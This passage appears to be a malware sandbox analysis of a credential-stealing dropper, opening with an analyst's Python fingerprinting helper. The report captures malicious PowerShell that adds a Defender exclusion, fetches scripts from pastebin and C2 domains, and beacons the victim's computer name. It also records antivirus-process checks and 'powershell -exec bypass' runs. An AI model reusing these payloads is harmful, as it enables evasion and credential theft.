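        reasons.append("multipart POST to /api with hwid/pid/lid parts (sessions 5-7)")
    if path == "/api" and content_type == "application/x-www-form-urlencoded" \
            and fields.get("act") == "get_message" and {"ver", "lid", "hwid"} <= names:
        reasons.append("urlencoded act=get_message with ver/lid/hwid (session 8)")
    return reasons


def shared_indicators(*field_dicts):
    """(hwid, lid) if every parsed request carries the same pair, else None."""
    pairs = {(f.get("hwid"), f.get("lid")) for f in field_dicts}
    return pairs.pop() if len(pairs) == 1 else None


if __name__ == "__main__":
    beacon = parse_multipart(MULTIPART_BODY, BOUNDARY)
    poll = parse_get_message(GET_MESSAGE_HEX)
    print(fingerprint("/api", "multipart/form-data; boundary=" + BOUNDARY, beacon))
    print(fingerprint("/api", "application/x-www-form-urlencoded", poll))
    print("pivot on hwid/lid:", shared_indicators(beacon, poll))
```

The boundary-tail check is only there because the report truncates the body; on a complete capture every part ends with CRLF followed by a full boundary and the check never fires. The hwid/lid pair is what ties the four sessions together, so it is the natural value to pivot on across a proxy log.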

Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49848 | Destination IP: 104.20.4.235 | Destination Port: 443 | PID: 6180 | Process: C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:13:15 UTC | 199 bytes | OUT | GET /raw/erLX7UsT HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: pastebin.com
2024-11-29 14:13:16 UTC | 391 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:13:16 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Fri, 29 Nov 2024 14:13:16 GMT
Server: cloudflare
CF-RAY: 8ea33285cba71a30-EWR
2024-11-29 14:13:16 UTC | 626 bytes | IN | Data Raw: 32 36 62 0d 0a 24 6d 33 78 38 79 6b 32 6a 35 71 37 3d 22 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 3b 24 61 31 6b 39 7a 73 37 64 36 66 68 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 42 79 74 65 73 28 22 55 6e 69 71 75 65 53 74 72 69 6e 67 31 22 29 3b 24 77 32 66 68 36 7a 6b 33 6c 39 6a 79 3d 28 24 6d 33 78 38 79 6b 32 6a 35 71 37 2b 22 27 24 65 6e 76 3a 54 45 4d 50 27 22 29 3b 24 70 39 6c 6b 37 7a 64 35 6a 33 78 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 24 61 31 6b 39 7a 73 37 64 36 66 68 29 3b 24 76 34 6a 6b 38 78 37 6c 32 66 68 3d 28 24 6d 33 78 38 79 6b 32 6a
Data Ascii (CRLF shown as \r\n; chunk size 0x26b = 619 bytes, of which the report shows only the start): 26b\r\n$m3x8yk2j5q7="Add-MpPreference -ExclusionPath ";$a1k9zs7d6fh=[System.Text.Encoding]::ASCII.GetBytes("UniqueString1");$w2fh6zk3l9jy=($m3x8yk2j5q7+"'$env:TEMP'");$p9lk7zd5j3x=[System.Text.Encoding]::ASCII.GetString($a1k9zs7d6fh);$v4jk8x7l2fh=($m3x8yk2j [truncated in the report]
                                                                                                                                      2024-11-29 14:13:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49854 | 104.21.58.94 | 443 | 6180 | C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:13:18 UTC | 203 | OUT | GET /4b882c8/script HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: silversky.club
2024-11-29 14:13:18 UTC | 835 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:13:18 GMT
Content-Length: 331
Connection: close
Last-Modified: Mon, 18 Nov 2024 21:17:30 GMT
ETag: "14b-6273671bd049a"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofxKOtmqjUjNWzFwIL7D6nplulSXZvQj02%2BK2y4zf4ZoKMe7Kh3jrwC14tAkgSJqoVrKZr0ayNdo97QFCb%2B298eYohByWzC1qx5JOqVE9XfVRiFRGabnG8dmKe4bJJGUYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea332957930191e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1598&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=817&delivery_rate=1781574&cwnd=238&unsent_bytes=0&cid=fa3f95e06bf39ab7&ts=707&x=0"
2024-11-29 14:13:18 UTC | 331 | IN | Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://snowqueen.site/calling.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/



                                                                                                                                      Target ID:0
                                                                                                                                      Start time:09:11:54
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\'Setup.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:1'076'464 bytes
                                                                                                                                      MD5 hash:B00B38068B134113EB53676C33A59A93
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:09:11:54
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:09:11:54
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:09:11:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:tasklist
                                                                                                                                      Imagebase:0xb00000
                                                                                                                                      File size:79'360 bytes
                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:09:11:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:findstr /I "wrsa opssvc"
                                                                                                                                      Imagebase:0x630000
                                                                                                                                      File size:29'696 bytes
                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:09:11:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:tasklist
                                                                                                                                      Imagebase:0xb00000
                                                                                                                                      File size:79'360 bytes
                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:09:11:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                      Imagebase:0x630000
                                                                                                                                      File size:29'696 bytes
                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:09:11:58
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:cmd /c md 108941
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:09:11:58
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:cmd /c copy /b ..\Lines + ..\Edmonton + ..\Characterization + ..\Tampa + ..\Poet + ..\Artwork + ..\Butts + ..\Harbor A
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:09:11:58
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:Contrast.com A
                                                                                                                                      Imagebase:0x510000
                                                                                                                                      File size:893'608 bytes
                                                                                                                                      MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:09:11:58
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                      Imagebase:0x450000
                                                                                                                                      File size:28'160 bytes
                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:09:13:14
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1"
                                                                                                                                      Imagebase:0x760000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:09:13:14
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:09:13:16
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                      Imagebase:0x7ff6ef0c0000
                                                                                                                                      File size:496'640 bytes
                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:09:13:17
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\5TM3JMZQCYKEYRKL75T8.ps1"
                                                                                                                                      Imagebase:0x760000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:09:13:17
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true


                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:17.5%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:21%
                                                                                                                                        Total number of Nodes:1482
                                                                                                                                        Total number of Limit Nodes:25
4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 
3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 
3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 
MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 
3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 
